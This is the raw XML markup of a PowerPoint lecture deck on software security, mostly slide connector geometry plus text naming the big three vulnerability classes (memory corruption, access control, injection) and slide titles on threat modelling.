            <a:avLst>
              <a:gd name="adj1" fmla="val 51279"/>
              <a:gd name="adj2" fmla="val 49976"/>
              <a:gd name="adj3" fmla="val 48925"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg1">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1313" name="Connector: Curved 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{975802E5-68B2-C7B8-16A0-C592AAFFB9F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1235" idx="3"/>
            <a:endCxn id="1221" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="3910140"/>
            <a:ext cx="341640" cy="148860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14" name="Straight Arrow Connector 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F652A7A7-42DD-6AA6-6259-4F3FC6AEB68A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922280" y="5395680"/>
            <a:ext cx="407160" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975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16" name="Connector: Curved 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{363F8107-5BC1-A63A-9948-BCCA2DFDF3D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1201" idx="3"/>
            <a:endCxn id="1293" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7517880" y="1925280"/>
            <a:ext cx="357480" cy="975240"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50403"/>
              <a:gd name="adj2" fmla="val 50036"/>
              <a:gd name="adj3" fmla="val 49596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17" name="Connector: Curved 127">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF677D2-A3D0-95D8-727F-51A64FF89F45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1221" idx="3"/>
            <a:endCxn id="1295" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517880" y="2403720"/>
            <a:ext cx="357480" cy="1506600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector5">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50403"/>
              <a:gd name="adj2" fmla="val 49976"/>
              <a:gd name="adj3" fmla="val 49596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315" name="Connector: Curved 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C14FBA2-A4C1-5DD8-5B8F-B81549769FCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7477920" y="2418660"/>
            <a:ext cx="361440" cy="974880"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43879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89" name="Connector: Curved 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{024CC1F0-E295-FF0F-211F-A5D4DDDC7918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1234" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="4227121"/>
            <a:ext cx="171720" cy="1159379"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="none" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1274" name="Connector: Curved 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0384B04-7F5A-551F-EF67-AE3B73E83212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1211" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4966560" y="2917980"/>
            <a:ext cx="35928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59" name="Connector: Curved 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBD8290E-B7C7-C6E3-73D0-48F8306CFE93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1219" idx="3"/>
            <a:endCxn id="1245" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="3414060"/>
            <a:ext cx="342720" cy="488520"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="808080">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1304" name="Connector: Curved 146">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18A76C76-29FF-4D2C-94A8-C490248871DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1243" idx="3"/>
            <a:endCxn id="1292" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7517880" y="1429380"/>
            <a:ext cx="364320" cy="4465440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 33807"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1189" name="Connector: Curved 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7748ECDE-0581-590F-504B-36FF85B6ED8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1216" idx="3"/>
            <a:endCxn id="1195" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6251760" y="1429380"/>
            <a:ext cx="341640" cy="198468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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1283" name="Connector: Curved 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16F78AB8-57E7-E6B4-A874-947C9E645783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1199" idx="3"/>
            <a:endCxn id="1227" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251760" y="1925460"/>
            <a:ext cx="341640" cy="248076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sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1279" name="Connector: Curved 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64DEFD3-C016-1D10-E832-9DC147ACBB5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1204" idx="3"/>
            <a:endCxn id="1200" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="1925460"/>
            <a:ext cx="343440" cy="49320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59" name="Connector: Curved 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19F21414-C2DC-6F7F-7D65-1A440EF4B064}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="1196" idx="3"/>
            <a:endCxn id="1209" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163880" y="1925460"/>
            <a:ext cx="321120" cy="98784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57" name="Connector: Curved 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0698C2D3-E75C-B6FE-AF6C-896A468C05DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1202" idx="3"/>
            <a:endCxn id="1223" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151640" y="2421540"/>
            <a:ext cx="333720" cy="1984680"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 30113"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1262" name="Connector: Curved 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84AE87F4-2528-B9F4-5BD5-2DB614E6C453}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1238" idx="3"/>
            <a:endCxn id="1233" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1151640" y="5398740"/>
            <a:ext cx="333720" cy="496080"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="CCCCCC"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1258" name="Connector: Curved 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB43C074-B214-4BE0-8541-E00DECAF1BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1202" idx="3"/>
            <a:endCxn id="1239" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151640" y="2421540"/>
            <a:ext cx="333720" cy="3473280"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 34532"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="sm" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1290" name="Connector: Curved 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5822EC3-6BF8-8CE4-35EC-F856D5AA88C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1224" idx="3"/>
            <a:endCxn id="1220" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="3910140"/>
            <a:ext cx="343440" cy="48708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56" name="Connector: Curved 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA05845-8ADD-54EA-1834-C0875CA687F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1230" idx="3"/>
            <a:endCxn id="1226" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3695400" y="4406220"/>
            <a:ext cx="343440" cy="48564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 w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1269" name="Straight Arrow Connector 93">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0E2C413-8B5E-D348-51A0-79D0C39D1D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3652200" y="5895000"/>
            <a:ext cx="407520" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="53975">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6E5AB30-F5BF-2206-0BD7-F02D5CBA2212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3714875" y="323654"/>
            <a:ext cx="2779316" cy="521766"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D05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2800" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>access control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286" name="Connector: Curved 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4201C40F-E757-92CD-5692-BBDF29C527E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="1311" idx="3"/>
            <a:endCxn id="1216" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4966560" y="3414060"/>
            <a:ext cx="359280" cy="1488600"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:srgbClr val="92D050"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 2" descr="A red starburst with white text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A1F24D-91EF-F4FA-74A8-32507A831F7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2831106">
            <a:off x="2189925" y="2585808"/>
            <a:ext cx="337199" cy="351142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" name="Picture 2" descr="A red starburst with white text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0F116A7-EE04-84E5-3D1C-A818C8CBD67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2831106">
            <a:off x="2168323" y="3098358"/>
            <a:ext cx="337199" cy="351142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2" descr="A red starburst with white text&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CCF7E7B-2E84-189D-4BCF-54828CF2505D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="2831106">
            <a:off x="7286985" y="5604276"/>
            <a:ext cx="337199" cy="351142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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{710133C3-3236-04CD-8C47-411A925895DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546863" y="319860"/>
            <a:ext cx="3738914" cy="5599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46040">
              <a:lnSpc>
                <a:spcPct val="116000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C5000B"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold"/>
              </a:rPr>
              <a:t>All issues due to </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" spc="-1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Connector: Curved 77">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCE24A51-431B-24D7-83B8-E721E9F18678}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2420280" y="1419840"/>
            <a:ext cx="349560" cy="505440"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="bg2">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:rou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3251863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1DA94-53E9-6B38-F3AF-C9748DEC4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F3DDE9E-BAB5-A0C9-C407-1D693EB57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 three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B4FFC5-A966-D1AB-C295-C9B30E6BE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The big three classes of security problems are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rgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory corruption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rgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>access control   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incl.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>authentication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rgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insecure input handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p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r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0"/>
              <a:t>Structural solutions?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For 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory-safe languages!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For 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access control problems probably hardest to structurally  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            prevent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For 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Techniques for secure input handling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can provide structural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               improvement, as we’ll discuss next weeks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF99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1500D9-03C1-BE0B-C82E-A9DD0C3A87D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D3A9F61A-0238-41AE-BB0B-6E00DBB90FAC}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>56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09603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1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Times New Roman"/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Comic Sans MS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92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92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4317</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1000</Paragraphs>
  <Slides>56</Slides>
  <Notes>6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8" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Narrow</vt:lpstr>
      <vt:lpstr>Arial Rounded MT Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Comic Sans MS</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Kunstler Script</vt:lpstr>
      <vt:lpstr>Pieces NFI</vt:lpstr>
      <vt:lpstr>Stencil</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>1_Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> Software Security  Threat Modelling &amp; All other vulnerability categories (besides memory corruption) </vt:lpstr>
      <vt:lpstr>security = getting rid of bugs?</vt:lpstr>
      <vt:lpstr>What does security mean?</vt:lpstr>
      <vt:lpstr>Some of the security requirements &amp; control</vt:lpstr>
      <vt:lpstr>Which of these is more secure?</vt:lpstr>
      <vt:lpstr>Some differences that affect security</vt:lpstr>
      <vt:lpstr> Software Security  Threat Modelling  </vt:lpstr>
      <vt:lpstr>Threat modelling</vt:lpstr>
      <vt:lpstr>Importance of  threat modelling</vt:lpstr>
      <vt:lpstr>Iterative nature of threat modelling</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Threat modelling concepts</vt:lpstr>
      <vt:lpstr> Trust</vt:lpstr>
      <vt:lpstr>Threat modelling &amp; attacker models</vt:lpstr>
      <vt:lpstr>Threat modelling techniques  </vt:lpstr>
      <vt:lpstr>prevention vs detection &amp; reaction</vt:lpstr>
